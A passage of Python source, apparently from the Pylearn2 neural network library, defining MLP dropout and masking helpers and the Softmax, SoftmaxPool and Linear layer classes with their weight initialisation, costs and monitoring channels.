mask : int
An integer indexing possible binary masks. It should be
< 2 ** get_total_input_dimension(masked_input_layers)
and greater than or equal to 0.
masked_input_layers : list, optional
A list of layer names to mask. If `None`, the input to all layers
(including the first hidden layer) is masked.
default_input_scale : float, optional
The amount to scale inputs in masked layers that do not appear in
`input_scales`. Defaults to 2.
input_scales : dict, optional
A dictionary mapping layer names to floating point numbers
indicating how much to scale input to a given layer.
Returns
-------
masked_output : tensor_like
The output of the forward propagation of the masked network.
"""
if input_scales is not None:
self._validate_layer_names(input_scales)
else:
input_scales = {}
if any(n not in masked_input_layers for n in input_scales):
layers = [n for n in input_scales if n not in masked_input_layers]
raise ValueError("input scales provided for layer not masked: " %
", ".join(layers))
if masked_input_layers is not None:
self._validate_layer_names(masked_input_layers)
else:
masked_input_layers = self.layer_names
num_inputs = self.get_total_input_dimension(masked_input_layers)
assert mask >= 0, "Mask must be a non-negative integer."
if mask > 0 and math.log(mask, 2) > num_inputs:
raise ValueError("mask value of %d too large; only %d "
"inputs to layers (%s)" %
(mask, num_inputs,
", ".join(masked_input_layers)))
def binary_string(x, length, dtype):
"""
Create the binary representation of an integer `x`, padded to
`length`, with dtype `dtype`.
Parameters
----------
length : WRITEME
dtype : WRITEME
Returns
-------
WRITEME
"""
s = np.empty(length, dtype=dtype)
for i in range(length - 1, -1, -1):
if x // (2 ** i) == 1:
s[i] = 1
else:
s[i] = 0
x = x % (2 ** i)
return s
remaining_mask = mask
for layer in self.layers:
if layer.layer_name in masked_input_layers:
scale = input_scales.get(layer.layer_name,
default_input_scale)
n_inputs = layer.get_input_space().get_total_dimension()
layer_dropout_mask = remaining_mask & (2 ** n_inputs - 1)
remaining_mask >>= n_inputs
mask = binary_string(layer_dropout_mask, n_inputs,
'uint8')
shape = layer.get_input_space().get_origin_batch(1).shape
s_mask = T.as_tensor_variable(mask).reshape(shape)
if layer.dropout_input_mask_value == 0:
state_below = state_below * s_mask * scale
else:
state_below = T.switch(s_mask, state_below * scale,
layer.dropout_input_mask_value)
state_below = layer.fprop(state_below)
return state_below
def _validate_layer_names(self, layers):
"""
.. todo::
WRITEME
"""
if any(layer not in self.layer_names for layer in layers):
unknown_names = [layer for layer in layers
if layer not in self.layer_names]
raise ValueError("MLP has no layer(s) named %s" %
", ".join(unknown_names))
def get_total_input_dimension(self, layers):
"""
Get the total number of inputs to the layers whose
names are listed in `layers`. Used for computing the
total number of dropout masks.
Parameters
----------
layers : WRITEME
Returns
-------
WRITEME
"""
self._validate_layer_names(layers)
total = 0
for layer in self.layers:
if layer.layer_name in layers:
total += layer.get_input_space().get_total_dimension()
return total
@wraps(Layer.fprop)
def fprop(self, state_below, return_all=False):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
rval = self.layers[0].fprop(state_below)
rlist = [rval]
for layer in self.layers[1:]:
rval = layer.fprop(rval)
rlist.append(rval)
if return_all:
return rlist
return rval
def apply_dropout(self, state, include_prob, scale, theano_rng,
input_space, mask_value=0, per_example=True):
"""
.. todo::
WRITEME
Parameters
----------
state: WRITEME
include_prob : WRITEME
scale : WRITEME
theano_rng : WRITEME
input_space : WRITEME
mask_value : WRITEME
per_example : bool, optional
Sample a different mask value for every example in a batch.
Defaults to `True`. If `False`, sample one mask per mini-batch.
"""
if include_prob in [None, 1.0, 1]:
return state
assert scale is not None
if isinstance(state, tuple):
return tuple(self.apply_dropout(substate, include_prob,
scale, theano_rng, mask_value)
for substate in state)
# TODO: all of this assumes that if it's not a tuple, it's
# a dense tensor. It hasn't been tested with sparse types.
# A method to format the mask (or any other values) as
# the given symbolic type should be added to the Spaces
# interface.
if per_example:
mask = theano_rng.binomial(p=include_prob, size=state.shape,
dtype=state.dtype)
else:
batch = input_space.get_origin_batch(1)
mask = theano_rng.binomial(p=include_prob, size=batch.shape,
dtype=state.dtype)
rebroadcast = T.Rebroadcast(*zip(xrange(batch.ndim),
[s == 1 for s in batch.shape]))
mask = rebroadcast(mask)
if mask_value == 0:
rval = state * mask * scale
else:
rval = T.switch(mask, state * scale, mask_value)
return T.cast(rval, state.dtype)
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
return self.layers[-1].cost(Y, Y_hat)
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
return self.layers[-1].cost_matrix(Y, Y_hat)
@wraps(Layer.cost_from_cost_matrix)
def cost_from_cost_matrix(self, cost_matrix):
return self.layers[-1].cost_from_cost_matrix(cost_matrix)
def cost_from_X(self, data):
"""
Computes self.cost, but takes data=(X, Y) rather than Y_hat as an
argument.
This is just a wrapper around self.cost that computes Y_hat by
calling Y_hat = self.fprop(X)
Parameters
----------
data : WRITEME
"""
self.cost_from_X_data_specs()[0].validate(data)
X, Y = data
Y_hat = self.fprop(X)
return self.cost(Y, Y_hat)
def cost_from_X_data_specs(self):
"""
Returns the data specs needed by cost_from_X.
This is useful if cost_from_X is used in a MethodCost.
"""
space = CompositeSpace((self.get_input_space(),
self.get_target_space()))
source = (self.get_input_source(), self.get_target_source())
return (space, source)
def __str__(self):
"""
Summarizes the MLP by printing the size and format of the input to all
layers. Feel free to add reasonably concise info as needed.
"""
rval = []
for layer in self.layers:
rval.append(layer.layer_name)
input_space = layer.get_input_space()
rval.append('\tInput space: ' + str(input_space))
rval.append('\tTotal input dimension: ' +
str(input_space.get_total_dimension()))
rval = '\n'.join(rval)
return rval
class Softmax(Layer):
"""
A layer that can apply an optional affine transformation
to vectorial inputs followed by a softmax nonlinearity.
Parameters
----------
n_classes : int
Number of classes for softmax targets.
layer_name : string
Name of Softmax layers.
irange : float
If specified, initialized each weight randomly in
U(-irange, irange).
istdev : float
If specified, initialize each weight randomly from
N(0,istdev).
sparse_init : int
If specified, initial sparse_init number of weights
for each unit from N(0,1).
W_lr_scale : float
Scale for weight learning rate.
b_lr_scale : float
Scale for bias learning rate.
max_row_norm : float
Maximum norm for a row of the weight matrix.
no_affine : boolean
If True, softmax nonlinearity is applied directly to
inputs.
max_col_norm : float
Maximum norm for a column of the weight matrix.
init_bias_target_marginals : dataset
Take the probability distribution of the targets into account to
intelligently initialize biases.
binary_target_dim : int, optional
If your targets are class labels (i.e. a binary vector) then set the
number of targets here so that an IndexSpace of the proper dimension
can be used as the target space. This allows the softmax to compute
the cost much more quickly than if it needs to convert the targets
into a VectorSpace. With binary_target_dim>1, you can use one layer
to simultaneously predict a bag of words (i.e. order is not important,
the same element can be included more than once).
non_redundant : bool
If True, learns only n_classes - 1 biases and weight vectors
"""
def __init__(self, n_classes, layer_name, irange=None,
istdev=None,
sparse_init=None, W_lr_scale=None,
b_lr_scale=None, max_row_norm=None,
no_affine=False,
max_col_norm=None, init_bias_target_marginals=None,
binary_target_dim=None, non_redundant=False):
super(Softmax, self).__init__()
if max_col_norm is not None:
self.extensions.append(MaxL2FilterNorm(max_col_norm))
if non_redundant:
if init_bias_target_marginals:
msg = ("init_bias_target_marginals currently only works "
"with the overcomplete parameterization.")
raise NotImplementedError(msg)
if isinstance(W_lr_scale, str):
W_lr_scale = float(W_lr_scale)
self.__dict__.update(locals())
del self.self
del self.init_bias_target_marginals
if not isinstance(n_classes, py_integer_types):
raise TypeError("n_classes is of type %s, but must be integer" %
type(n_classes))
if binary_target_dim is not None:
assert isinstance(binary_target_dim, py_integer_types)
self._has_binary_target = True
self._target_space = IndexSpace(dim=binary_target_dim,
max_labels=n_classes)
else:
self._has_binary_target = False
self.output_space = VectorSpace(n_classes)
if not no_affine:
self.b = sharedX(np.zeros((n_classes - self.non_redundant,)),
name='softmax_b')
if init_bias_target_marginals:
y = init_bias_target_marginals.y
if init_bias_target_marginals.y_labels is None:
marginals = y.mean(axis=0)
else:
# compute class frequencies
if np.max(y.shape) != np.prod(y.shape):
raise AssertionError("Use of "
"`init_bias_target_marginals` "
"requires that each example has "
"a single label.")
marginals = np.bincount(y.flat) / float(y.shape[0])
assert marginals.ndim == 1
b = pseudoinverse_softmax_numpy(marginals).astype(self.b.dtype)
assert b.ndim == 1
assert b.dtype == self.b.dtype
self.b.set_value(b)
else:
assert init_bias_target_marginals is None
def __setstate__(self, state):
super(Softmax, self).__setstate__(state)
# Patch old pickle files
if not hasattr(self, 'non_redundant'):
self.non_redundant = False
if not hasattr(self, 'mask_weights'):
self.mask_weights = None
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
rval = OrderedDict()
if self.W_lr_scale is not None:
assert isinstance(self.W_lr_scale, float)
rval[self.W] = self.W_lr_scale
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
if self.b_lr_scale is not None:
assert isinstance(self.b_lr_scale, float)
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = OrderedDict()
if not self.no_affine:
W = self.W
assert W.ndim == 2
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=1))
col_norms = T.sqrt(sq_W.sum(axis=0))
rval.update(OrderedDict([('row_norms_min', row_norms.min()),
('row_norms_mean', row_norms.mean()),
('row_norms_max', row_norms.max()),
('col_norms_min', col_norms.min()),
('col_norms_mean', col_norms.mean()),
('col_norms_max', col_norms.max()), ]))
if (state_below is not None) or (state is not None):
if state is None:
state = self.fprop(state_below)
mx = state.max(axis=1)
rval.update(OrderedDict([('mean_max_class', mx.mean()),
('max_max_class', mx.max()),
('min_max_class', mx.min())]))
if (targets is not None):
if ((not self._has_binary_target) or
self.binary_target_dim == 1):
# if binary_target_dim>1, the misclass rate is ill-defined
y_hat = T.argmax(state, axis=1)
y = (targets.reshape(y_hat.shape)
if self._has_binary_target
else T.argmax(targets, axis=1))
misclass = T.neq(y, y_hat).mean()
misclass = T.cast(misclass, config.floatX)
rval['misclass'] = misclass
rval['nll'] = self.cost(Y_hat=state, Y=targets)
return rval
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if not isinstance(space, Space):
raise TypeError("Expected Space, got " +
str(space) + " of type " + str(type(space)))
self.input_dim = space.get_total_dimension()
self.needs_reformat = not isinstance(space, VectorSpace)
if self.no_affine:
desired_dim = self.n_classes - self.non_redundant
assert self.input_dim == desired_dim
else:
desired_dim = self.input_dim
self.desired_space = VectorSpace(desired_dim)
if not self.needs_reformat:
assert self.desired_space == self.input_space
rng = self.mlp.rng
if self.no_affine:
self._params = []
else:
num_cols = self.n_classes - self.non_redundant
if self.irange is not None:
assert self.istdev is None
assert self.sparse_init is None
W = rng.uniform(-self.irange,
self.irange,
(self.input_dim, num_cols))
elif self.istdev is not None:
assert self.sparse_init is None
W = rng.randn(self.input_dim, num_cols) * self.istdev
else:
assert self.sparse_init is not None
W = np.zeros((self.input_dim, num_cols))
for i in xrange(num_cols):
for j in xrange(self.sparse_init):
idx = rng.randint(0, self.input_dim)
while W[idx, i] != 0.:
idx = rng.randint(0, self.input_dim)
W[idx, i] = rng.randn()
self.W = sharedX(W, 'softmax_W')
self._params = [self.b, self.W]
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not isinstance(self.input_space, Conv2DSpace):
raise NotImplementedError()
desired = self.W.get_value().T
ipt = self.desired_space.np_format_as(desired, self.input_space)
rval = Conv2DSpace.convert_numpy(ipt,
self.input_space.axes,
('b', 0, 1, 'c'))
return rval
@wraps(Layer.get_weights)
def get_weights(self):
if not isinstance(self.input_space, VectorSpace):
raise NotImplementedError()
return self.W.get_value()
@wraps(Layer.set_weights)
def set_weights(self, weights):
self.W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.fprop)
def fprop(self, state_below):
self.input_space.validate(state_below)
if self.needs_reformat:
state_below = self.input_space.format_as(state_below,
self.desired_space)
self.desired_space.validate(state_below)
assert state_below.ndim == 2
if not hasattr(self, 'no_affine'):
self.no_affine = False
if self.no_affine:
Z = state_below
else:
assert self.W.ndim == 2
b = self.b
Z = T.dot(state_below, self.W) + b
if self.non_redundant:
zeros = T.alloc(0., Z.shape[0], 1)
Z = T.concatenate((zeros, Z), axis=1)
rval = T.nnet.softmax(Z)
for value in get_debug_values(rval):
if self.mlp.batch_size is not None:
assert value.shape[0] == self.mlp.batch_size
return rval
def _cost(self, Y, Y_hat):
z = arg_of_softmax(Y_hat)
assert z.ndim == 2
z = z - z.max(axis=1).dimshuffle(0, 'x')
log_prob = z - T.log(T.exp(z).sum(axis=1).dimshuffle(0, 'x'))
# we use sum and not mean because this is really one variable per row
if self._has_binary_target:
# The following code is the equivalent of accessing log_prob by the
# indices in Y, but it is written such that the computation can
# happen on the GPU rather than CPU.
flat_Y = Y.flatten()
flat_Y.name = 'flat_Y'
flat_log_prob = log_prob.flatten()
flat_log_prob.name = 'flat_log_prob'
range_ = T.arange(Y.shape[0])
if self.binary_target_dim > 1:
# because of an error in optimization (local_useless_tile)
# when tiling with (1, 1)
range_ = T.tile(range_.dimshuffle(0, 'x'),
(1, self.binary_target_dim)).flatten()
flat_indices = flat_Y + range_ * self.n_classes
flat_indices.name = 'flat_indices'
log_prob_of = flat_log_prob[flat_indices].reshape(Y.shape, ndim=2)
log_prob_of.name = 'log_prob_of'
else:
log_prob_of = (Y * log_prob)
return log_prob_of
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
log_prob_of = self._cost(Y, Y_hat).sum(axis=1)
assert log_prob_of.ndim == 1
rval = log_prob_of.mean()
return - rval
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
log_prob_of = self._cost(Y, Y_hat)
if self._has_binary_target:
flat_Y = Y.flatten()
flat_matrix = T.alloc(0, (Y.shape[0] * log_prob_of.shape[1]))
flat_indices = flat_Y + T.extra_ops.repeat(
T.arange(Y.shape[0]) * log_prob_of.shape[1], Y.shape[1]
)
log_prob_of = T.set_subtensor(flat_matrix[flat_indices], flat_Y)
return -log_prob_of
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
return coeff * T.sqr(self.W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W = self.W
return coeff * abs(W).sum()
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.no_affine:
return
if self.max_row_norm is not None:
W = self.W
if W in updates:
updated_W = updates[W]
row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=1))
desired_norms = T.clip(row_norms, 0, self.max_row_norm)
scales = desired_norms / (1e-7 + row_norms)
updates[W] = updated_W * scales.dimshuffle(0, 'x')
class SoftmaxPool(Layer):
"""
A hidden layer that uses the softmax function to do max pooling over groups
of units. When the pooling size is 1, this reduces to a standard sigmoidal
MLP layer.
Parameters
----------
detector_layer_dim : WRITEME
layer_name : WRITEME
pool_size : WRITEME
irange : WRITEME
sparse_init : WRITEME
sparse_stdev : WRITEME
include_prob : float, optional
Probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is
initialized to 0.
init_bias : WRITEME
W_lr_scale : WRITEME
b_lr_scale : WRITEME
mask_weights : WRITEME
max_col_norm : WRITEME
"""
def __init__(self,
detector_layer_dim,
layer_name,
pool_size=1,
irange=None,
sparse_init=None,
sparse_stdev=1.,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
mask_weights=None,
max_col_norm=None):
super(SoftmaxPool, self).__init__()
self.__dict__.update(locals())
del self.self
self.b = sharedX(np.zeros((self.detector_layer_dim,)) + init_bias,
name=(layer_name + '_b'))
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
if not hasattr(self, 'W_lr_scale'):
self.W_lr_scale = None
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
rval = OrderedDict()
if self.W_lr_scale is not None:
W, = self.transformer.get_params()
rval[W] = self.W_lr_scale
if self.b_lr_scale is not None:
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if isinstance(space, VectorSpace):
self.requires_reformat = False
self.input_dim = space.dim
else:
self.requires_reformat = True
self.input_dim = space.get_total_dimension()
self.desired_space = VectorSpace(self.input_dim)
if not (self.detector_layer_dim % self.pool_size == 0):
raise ValueError("detector_layer_dim = %d, pool_size = %d. "
"Should be divisible but remainder is %d" %
(self.detector_layer_dim,
self.pool_size,
self.detector_layer_dim % self.pool_size))
self.h_space = VectorSpace(self.detector_layer_dim)
self.pool_layer_dim = self.detector_layer_dim / self.pool_size
self.output_space = VectorSpace(self.pool_layer_dim)
rng = self.mlp.rng
if self.irange is not None:
assert self.sparse_init is None
W = rng.uniform(-self.irange,
self.irange,
(self.input_dim, self.detector_layer_dim)) * \
(rng.uniform(0., 1., (self.input_dim, self.detector_layer_dim))
< self.include_prob)
else:
assert self.sparse_init is not None
W = np.zeros((self.input_dim, self.detector_layer_dim))
def mask_rejects(idx, i):
if self.mask_weights is None:
return False
return self.mask_weights[idx, i] == 0.
for i in xrange(self.detector_layer_dim):
assert self.sparse_init <= self.input_dim
for j in xrange(self.sparse_init):
idx = rng.randint(0, self.input_dim)
while W[idx, i] != 0 or mask_rejects(idx, i):
idx = rng.randint(0, self.input_dim)
W[idx, i] = rng.randn()
W *= self.sparse_stdev
W = sharedX(W)
W.name = self.layer_name + '_W'
self.transformer = MatrixMul(W)
W, = self.transformer.get_params()
assert W.name is not None
if self.mask_weights is not None:
expected_shape = (self.input_dim, self.detector_layer_dim)
if expected_shape != self.mask_weights.shape:
raise ValueError("Expected mask with shape " +
str(expected_shape) +
" but got " +
str(self.mask_weights.shape))
self.mask = sharedX(self.mask_weights)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.mask_weights is not None:
W, = self.transformer.get_params()
if W in updates:
updates[W] = updates[W] * self.mask
if self.max_col_norm is not None:
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
col_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=0))
desired_norms = T.clip(col_norms, 0, self.max_col_norm)
updates[W] = updated_W * (desired_norms / (1e-7 + col_norms))
@wraps(Layer.get_params)
def get_params(self):
assert self.b.name is not None
W, = self.transformer.get_params()
assert W.name is not None
rval = self.transformer.get_params()
assert not isinstance(rval, set)
rval = list(rval)
assert self.b not in rval
rval.append(self.b)
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * T.sqr(W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * abs(W).sum()
@wraps(Layer.get_weights)
def get_weights(self):
if self.requires_reformat:
# This is not really an unimplemented case.
# We actually don't know how to format the weights
# in design space. We got the data in topo space
# and we don't have access to the dataset
raise NotImplementedError()
W, = self.transformer.get_params()
return W.get_value()
@wraps(Layer.set_weights)
def set_weights(self, weights):
W, = self.transformer.get_params()
W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
"""
.. todo::
WRITEME
"""
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.get_weights_view_shape)
def get_weights_view_shape(self):
total = self.detector_layer_dim
cols = self.pool_size
if cols == 1:
# Let the PatchViewer decide how to arrange the units
# when they're not pooled
raise NotImplementedError()
# When they are pooled, make each pooling unit have one row
rows = total / cols
return rows, cols
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not isinstance(self.input_space, Conv2DSpace):
raise NotImplementedError()
W, = self.transformer.get_params()
W = W.T
W = W.reshape((self.detector_layer_dim,
self.input_space.shape[0],
self.input_space.shape[1],
self.input_space.num_channels))
W = Conv2DSpace.convert(W, self.input_space.axes, ('b', 0, 1, 'c'))
return function([], W)()
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, **kwargs):
W, = self.transformer.get_params()
assert W.ndim == 2
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=1))
col_norms = T.sqrt(sq_W.sum(axis=0))
rval = OrderedDict([('row_norms_min', row_norms.min()),
('row_norms_mean', row_norms.mean()),
('row_norms_max', row_norms.max()),
('col_norms_min', col_norms.min()),
('col_norms_mean', col_norms.mean()),
('col_norms_max', col_norms.max()), ])
if (state_below is not None) or (state is not None):
if state is None:
P = self.fprop(state_below)
else:
P = state
if self.pool_size == 1:
vars_and_prefixes = [(P, '')]
else:
vars_and_prefixes = [(P, 'p_')]
for var, prefix in vars_and_prefixes:
v_max = var.max(axis=0)
v_min = var.min(axis=0)
v_mean = var.mean(axis=0)
v_range = v_max - v_min
# max_x.mean_u is "the mean over *u*nits of the max over
# e*x*amples" The x and u are included in the name because
# otherwise its hard to remember which axis is which when
# reading the monitor I use inner.outer rather than
# outer_of_inner or something like that because I want
# mean_x.* to appear next to each other in the alphabetical
# list, as these are commonly plotted together
for key, val in [('max_x.max_u', v_max.max()),
('max_x.mean_u', v_max.mean()),
('max_x.min_u', v_max.min()),
('min_x.max_u', v_min.max()),
('min_x.mean_u', v_min.mean()),
('min_x.min_u', v_min.min()),
('range_x.max_u', v_range.max()),
('range_x.mean_u', v_range.mean()),
('range_x.min_u', v_range.min()),
('mean_x.max_u', v_mean.max()),
('mean_x.mean_u', v_mean.mean()),
('mean_x.min_u', v_mean.min())]:
rval[prefix + key] = val
return rval
@wraps(Layer.fprop)
def fprop(self, state_below):
self.input_space.validate(state_below)
if self.requires_reformat:
state_below = self.input_space.format_as(state_below,
self.desired_space)
z = self.transformer.lmul(state_below) + self.b
if self.layer_name is not None:
z.name = self.layer_name + '_z'
p, h = max_pool_channels(z, self.pool_size)
p.name = self.layer_name + '_p_'
return p
class Linear(Layer):
"""
A "linear model" in machine learning terminology. This would be more
accurately described as an affine model because it adds an offset to
the output as well as doing a matrix multiplication. The output is:
output = T.dot(weights, input) + biases
This class may be used as the output layer of an MLP for regression.
It may also be used as a hidden layer. Most hidden layers classes are
subclasses of this class that add apply a fixed nonlinearity to the
output of the affine transformation provided by this class.
One notable use of this class is to provide "bottleneck" layers.
By using a Linear layer with few hidden units followed by a nonlinear
layer such as RectifiedLinear with many hidden units, one essentially
gets a RectifiedLinear layer with a factored weight matrix, which can
reduce the number of parameters in the model (by making the effective
weight matrix low rank).
Parameters
----------
dim : int
The number of elements in the output of the layer.
layer_name : str
The name of the layer. All layers in an MLP must have a unique name.
irange : WRITEME
istdev : WRITEME
sparse_init : WRITEME
sparse_stdev : WRITEME
include_prob : float
Probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is
initialized to 0.
Anything that can be broadcasted to a numpy vector.
Provides the initial value of the biases of the model.
When using this class as an output layer (specifically the Linear
class, or subclasses that don't change the output like
LinearGaussian, but not subclasses that change the output, like
Softmax) it can be a good idea to set this to the return value of
the `mean_of_targets` function. This provides the mean value of
all the targets in the training set, so the model is initialized
to a dummy model that predicts the expected value of each output
variable.
W_lr_scale : float, optional
Multiply the learning rate on the weights by this constant.
b_lr_scale : float, optional
Multiply the learning rate on the biases by this constant.
mask_weights : ndarray, optional
If provided, the weights will be multiplied by this mask after each
learning update.
max_row_norm : WRITEME
max_col_norm : WRITEME
min_col_norm : WRITEME
copy_input : REMOVED
use_abs_loss : bool, optional
If True, the cost function will be mean absolute error rather
than mean squared error.
You can think of mean squared error as fitting a Gaussian
distribution with variance 1, or as learning to predict the mean
of the data.
You can think of mean absolute error as fitting a Laplace
distribution with variance 1, or as learning to predict the
median of the data.
use_bias : bool, optional
If False, does not add the bias term to the output.
"""
def __init__(self,
dim,
layer_name,
irange=None,
istdev=None,
sparse_init=None,
sparse_stdev=1.,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
mask_weights=None,
max_row_norm=None,
max_col_norm=None,
min_col_norm=None,
copy_input=None,
use_abs_loss=False,
use_bias=True):
if copy_input is not None:
raise AssertionError(
"The copy_input option had a bug and has "
"been removed from the library.")
super(Linear, self).__init__()
if use_bias and init_bias is None:
init_bias = 0.
self.__dict__.update(locals())
del self.self
if use_bias:
self.b = sharedX(np.zeros((self.dim,)) + init_bias,
name=(layer_name + '_b'))
else:
assert b_lr_scale is None
init_bias is None
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
if not hasattr(self, 'W_lr_scale'):
self.W_lr_scale = None
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
rval = OrderedDict()
if self.W_lr_scale is not None:
W, = self.transformer.get_params()
rval[W] = self.W_lr_scale
if self.b_lr_scale is not None:
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if isinstance(space, VectorSpace):
self.requires_reformat = False
self.input_dim = space.dim
else:
self.requires_reformat = True
self.input_dim = space.get_total_dimension()
self.desired_space = VectorSpace(self.input_dim)
self.output_space = VectorSpace(self.dim)
rng = self.mlp.rng
if self.irange is not None:
assert self.istdev is None
assert self.sparse_init is None
W = rng.uniform(-self.irange,
self.irange,
(self.input_dim, self.dim)) * \
(rng.uniform(0., 1., (self.input_dim, self.dim))
< self.include_prob)
elif self.istdev is not None:
assert self.sparse_init is None
W = rng.randn(self.input_dim, self.dim) * self.istdev
else:
assert self.sparse_init is not None
W = np.zeros((self.input_dim, self.dim))
def mask_rejects(idx, i):
if self.mask_weights is None:
return False
return self.mask_weights[idx, i] == 0.
for i in xrange(self.dim):
assert self.sparse_init <= self.input_dim
for j in xrange(self.sparse_init):
idx = rng.randint(0, self.input_dim)
while W[idx, i] != 0 or mask_rejects(idx, i):
idx = rng.randint(0, self.input_dim)
W[idx, i] = rng.randn()
W *= self.sparse_stdev
W = sharedX(W)
W.name = self.layer_name + '_W'
self.transformer = MatrixMul(W)
W, = self.transformer.get_params()
assert W.name is not None
if self.mask_weights is not None:
expected_shape = (self.input_dim, self.dim)
if expected_shape != self.mask_weights.shape:
raise ValueError("Expected mask with shape " +
str(expected_shape) + " but got " +
str(self.mask_weights.shape))
self.mask = sharedX(self.mask_weights)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.mask_weights is not None:
W, = self.transformer.get_params()
if W in updates:
updates[W] = updates[W] * self.mask
if self.max_row_norm is not None:
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=1))
desired_norms = T.clip(row_norms, 0, self.max_row_norm)
scales = desired_norms / (1e-7 + row_norms)
updates[W] = updated_W * scales.dimshuffle(0, 'x')
if self.max_col_norm is not None or self.min_col_norm is not None:
assert self.max_row_norm is None
if self.max_col_norm is not None:
max_col_norm = self.max_col_norm
if self.min_col_norm is None:
self.min_col_norm = 0
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
col_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=0))
if self.max_col_norm is None:
max_col_norm = col_norms.max()
desired_norms = T.clip(col_norms,
self.min_col_norm,
max_col_norm)
updates[W] = updated_W * desired_norms / (1e-7 + col_norms)
@wraps(Layer.get_params)
def get_params(self):
W, = self.transformer.get_params()
assert W.name is not None
rval = self.transformer.get_params()
assert not isinstance(rval, set)
rval = list(rval)
if self.use_bias:
assert self.b.name is not None
assert self.b not in rval
rval.append(self.b)
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * T.sqr(W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * abs(W).sum()
@wraps(Layer.get_weights)
def get_weights(self):
if self.requires_reformat:
# This is not really an unimplemented case.
# We actually don't know how to format the weights
# in design space. We got the data in topo space
# and we don't have access to the dataset
raise NotImplementedError()
W, = self.transformer.get_params()
W = W.get_value()
return W
@wraps(Layer.set_weights)
def set_weights(self, weights):
W, = self.transformer.get_params()
W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
"""
.. todo::
WRITEME
"""
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not isinstance(self.input_space, Conv2DSpace):
raise NotImplementedError()
W, = self.transformer.get_params()
W = W.T
W = W.reshape((self.dim, self.input_space.shape[0],
self.input_space.shape[1],
self.input_space.num_channels))
W = Conv2DSpace.convert(W, self.input_space.axes, ('b', 0, 1, 'c'))
return function([], W)()
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
W, = self.transformer.get_params()
assert W.ndim == 2
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=1))
col_norms = T.sqrt(sq_W.sum(axis=0))
rval = OrderedDict([('row_norms_min', row_norms.min()),
('row_norms_mean', row_norms.mean()),
('row_norms_max', row_norms.max()),
('col_norms_min', col_norms.min()),
('col_norms_mean', col_norms.mean()),
('col_norms_max', col_norms.max()), ])
if (state is not None) or (state_below is not None):
if state is None:
